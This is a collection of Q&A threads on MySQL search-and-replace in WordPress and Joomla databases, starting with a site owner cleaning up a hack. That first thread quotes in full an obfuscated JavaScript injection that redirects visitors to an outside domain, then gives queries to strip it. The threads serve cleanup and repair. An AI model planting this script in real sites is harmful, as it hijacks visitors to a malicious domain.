Remove script injected into wordpress database - sql

My website got hacked and is now redirecting all new visitors to a shitty website.
I changed all passwords I can think of, installed Wordfence (I'm on wordpress), removed all malicious code from files.
Now I am left with close to 5000 posts in wp_posts table that still contain the same malicious code.
Namely this:
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return 
navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
I tried
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return 
navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>", " ")
But I get #1064 - Something is wrong in your syntax near'"<script>var _0x2cf4=['MSIE)' in line 1
Thanks for any help.

Thanks to #B. Go I came up with:
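-- Strip the injected redirect script from post bodies.
-- Back up wp_posts (or the whole database) before running; the rewrite cannot be undone.
-- The quantifier is lazy (.*?) so each match ends at the first </script> after the
-- marker; a greedy .* runs to the last </script> in the post and would also delete
-- any legitimate markup in between.
-- NOTE(review): by default '.' does not match line terminators, so a payload stored
-- with a line break inside it is left in place; search for the marker again afterwards.
-- Only wp_posts.post_content is cleaned here; other tables and files are not covered.
UPDATE wp_posts
SET
post_content = REGEXP_REPLACE(post_content, '<script>var _0x2cf4=.*?</script>', ' ')
WHERE
post_content RLIKE '<script>var _0x2cf4=.*?</script>';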
Still can't get rid of the malicious code on one page, but it doesn't seem to be in the DB.

If the malicious code appears in every post, you might also need to check your header and footer template files, which are loaded on every post, as well as core JS files that could contain the malicious code.
Also check whether any external JS is being loaded when the page loads.
If you have SSH access to the server, you can run grep -nr "var _0x2cf4=" to locate the affected files.
Hope it helps, thanks

Please, read this answer from one good guy:
https://wordpress.stackexchange.com/questions/357465/removing-malware-appended-to-each-post/358141#358141
Hope this helps

Using the REGEXP functions in MySQL:
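-- Removes inline <script type="text/javascript"> blocks from post bodies.
-- NOTE(review): this pattern is not specific to one injected payload; it also strips
-- legitimate inline scripts that carry the same type attribute, so narrow it to a
-- string unique to the injected code where one is known.
-- Lazy .*? ends each match at the nearest </script> instead of the last one in the post.
-- Back up the table before running.
UPDATE wp_posts
SET post_content = REGEXP_REPLACE(post_content, '<script type="text/javascript">.*?</script>', ' ')
WHERE post_content REGEXP '<script type="text/javascript">.*?</script>';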

Related

Moved site , all links got corrupted, need correct SQL query to fix

WordPress, moved from a LiteSpeed to an nginx server.
All of my links to plugins, images CSS and scripts added "%20" on the end. Example:
https://example.com%20/wp-content/plugins/wp-maintenance-mode/assets/css/style.min.css?
I assume the solution would be to change all "example.com%20" to "example.com" in the database. What would be the correct query to put in phpmyadmin?
I assume the solution would be to change all "example%20" to "example" in the database.
You can use replace():
-- Drop the stray "%20" that follows "example" in stored links.
-- '$' is declared as the LIKE escape character so that "$%" matches a literal
-- percent sign instead of acting as a wildcard.
UPDATE t
SET link = REPLACE(link, 'example%20', 'example')
WHERE link LIKE '%example$%20%' ESCAPE '$';
You have to be a little careful if 'example%20' were ever in the data before the change (i.e. is correct). However, that is unlikely in this case.
Found the solution, was a trailing space in wp-config.

SQL search and replace advanced

Usually when I search and replace I use this code:
UPDATE wp_posts SET post_content = REPLACE (post_content, 'old string', 'new string');
Now I'd like to replace <h1>Title</h1>with <table>...<h1>Title</h1>...</table>
Problem is of course that the text in between tags is different for all pages (it is a wordpress homepage).
Any ideas on how to solve this? Is it possible?
Try this; it updates the column and adds the text to every record:
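-- Wrap every row's post_content in <table>...</table>.
-- String literals take single quotes and are joined with CONCAT(): in MySQL,
-- backticks quote identifiers and + is numeric addition, not concatenation.
-- There is deliberately no WHERE clause, so every row of wp_posts is rewritten.
UPDATE wp_posts SET post_content = CONCAT('<table>', post_content, '</table>');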
If all you need is to put the <table>...</table> tags at the beginning and end, then use Anant Dabhi's solution. However, if you need to do anything smarter than that, SQL is really not the right tool for the job.
The problems with simplistic processing of HTML are many:
What if the tag you are looking for exists within a comment?
What if the <h1> tag has attributes inside it?
What if there is more than one <h1>...</h1> within a post?
The potential problems go on and on.
Since you are using WordPress, why not use PHP, which gives you access to real HTML parsers?
This discussion can get you started:
How do you parse and process HTML/XML in PHP?
These two UPDATE statements can help you do it:
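-- Open a <table> before each <h1> ...
UPDATE wp_posts
SET post_content = REPLACE(post_content, '<h1>', '<table><h1>');
-- ... and close it after the matching </h1>, so the tags nest correctly.
-- Only a bare <h1> is matched; headings with attributes get the closing tag only.
UPDATE wp_posts
SET post_content = REPLACE(post_content, '</h1>', '</h1></table>');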

help to get rid of HTML special chars in database

I've migrated my site from interspire CMS to Joomla! CMS.
I've managed to migrate all the database of articles, but some of them have a weird issue - when I access the page from joomla, the title contains HTML entities like ’.
As you can guess from the CMS's I use, I rely on PHP as my server side, and MySql for my database.
I tried to go over the titles of the articles in the database with htmlspecialchars_decode AND html_entity_decode in order to get rid of those, but it had no effect.
if I just grab an example from the DB and echo it, it will look OK:
What’s Your Pleasure, Lasagna Or Pizza Manchester Style?
if I go to the article page in joomla it will look like this:
What’s Your Pleasure, Lasagna Or Pizza Manchester Style?
When I go to PhpMyAdmin to see directly what is in the database, this is the contents of the title:
What’s Your Pleasure, Lasagna Or Pizza Manchester Style?
I even tried to remove the symbol with:
str_replace("’","",$title);
or replace it like this
str_replace('’',"'",$title);
but nothing.
When I tried to encode it again instead of decoding it (just to see if i'm on the right DB) it worked and encoded it again...
Please, I would be glad to have any new ideas...
Thanks,
Yanipan
Try setting encoding to cp1252. This worked out for me:
$decoded = html_entity_decode($your_string, ENT_QUOTES, 'cp1252');
Probably your best bet is to do search and replace within the database itself vs trying to do it with php. Search and replace in mysql is done like this:
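-- Generic search-and-replace template; substitute the table, column and strings.
-- String literals need straight single quotes; typographic quotes are a syntax error.
update TABLE_NAME set FIELD_NAME = replace(FIELD_NAME, 'find this string', 'replace found string with this string');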
So yours should look something like:
update ARTICLES set TITLE = replace(TITLE, '’', '\'');
Give that a shot.
Need more info
What is the character encoding on your database? That & or ;, may be something other than the typical ASCII.
It's possible that PHP/Joomla is double-encoding your string. Look at the browser's page source and find the text in the produced HTML. Instead of What’s, it might just be one of the following:
What&rsquo&59;s
What&38;rsquo&59;s
What&rsquo;s

Need to add LF to thousands of MySQL MEDIUMTEXT fields

I need to add a \n or LF or ASCII(x'0A') or however you want to encode it to the end of several thousand MySQL MEDIUMTEXT fields. I tried
update wp_posts set post_content = concat(post_content,ASCII(x'0A'));
but nothing is modified in the field as far as I can see. I suspect this is a limitation of MEDIUMTEXT/LONGTEXT fields, but it would be nice if MySQL would throw an error instead of saying it did something and doing nothing.
If I can't do it with update/concat, what other options do I have? Does someone have a chunk of php code I can use to do it in a loop?
Thanks for any input! I'm trying to get my wordpress site to validate with W3C, and I need the newlines so wordpress does not add a <p> tag inappropriately. Strange, I know.
I don't know where my brain was. I was using HeidiSQL as the interface to MySQL, and wasn't seeing the change in the database. But it did change, which I saw once I refreshed the table data. Sorry for the false question!
Try:
-- Append a line feed to every post body. MySQL reads '\n' inside a string
-- literal as LF unless the NO_BACKSLASH_ESCAPES SQL mode is enabled.
UPDATE wp_posts
SET post_content = CONCAT(post_content, '\n');
I tested with a mediumtext field here and worked..

MySQL: Replace substring if string ends in jpg, gif or png

I'm doing a favor for a friend, getting him off of Blogger and onto a hosted WordPress blog.
The big problem is, with over 1,800 posts, there are a lot of image links to deal with. WordPress has no mechanism to import these automatically, so I'm doing it manually.
I've used wget to download every single image that has ever been linked/embedded on the site. Now I need some help building a MySQL query to change all of the images in the blog to their new address.
For example:
http://www.externaldomain.com/some/link/to/an/image.jpg
Ought to become:
http://www.newbloghosting.com/wordpress/wp-content/uploads/legacy/www.externaldomain.com/some/link/to/an/image.jpg
So the condition is, if a string in post_content ends in jpeg, jpg, gif or png, replace:
http://
with
http://www.newbloghosting.com/wordpress/wp-content/uploads/legacy/
I know how to do a blanket replace with
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com');
But I'm having a hard time figuring out how to accomplish my more nuanced, conditional approach.
Thanks for any guidance you can offer. (Torn between posting here or ServerFault but SO looks like it has plenty of MySQL gurus, so here I am.)
MySQL has a great selection of string manipulation functions that you can plug into your query's WHERE section.
-- Rewrite the old domain to the new one in matching posts.
-- NOTE(review): RIGHT(post_content, n) looks at the last n characters of the whole
-- column value, so a row qualifies only when the post body itself ends in one of
-- these extensions; an image URL in the middle of a post does not qualify the row.
UPDATE wp_posts
SET post_content = REPLACE(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com')
WHERE RIGHT(post_content, 4) = 'jpeg'
OR RIGHT(post_content, 3) IN ('jpg', 'gif', 'png');
If it were me, though, I'd do two additional things: convert it to lowercase to match e.g. '.JPG', and match the dot before jpg, gif, etc.:
WHERE LOWER(RIGHT(post_content, 5)) = '.jpeg'
OR LOWER(RIGHT(post_content, 4)) IN ('.jpg', '.gif', '.png');
REPLACE will only perform an alteration if the old substring is found - I don't see the concern.
REPLACE(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com');
...will work. If you want to limit the updates to rows containing "jpeg", "jpg", "gif" and/or "png", add:
WHERE INSTR(post_content, 'jpeg') > 0
OR INSTR(post_content, 'jpg') > 0
OR INSTR(post_content, 'gif') > 0
OR INSTR(post_content, 'png') > 0
References:
REPLACE
INSTR
If everything fails, what about using the import feature? Then use a plugin to get your images as well (check for the comments in the plugin post since there are some relevant information).
I don't think it can be done in a simple query, but it's relatively easy to do with a simple php script. just have a simple loop in php to go over every single row with content and do a preg_replace on the content field, then update that single row.
It's not nearly as elegant as doing it in SQL, but it's sure to get the job done today as opposed to sometime this year.
P.S. this is assuming there is more content than just the URL, in which case normal mysql string functions would suffice.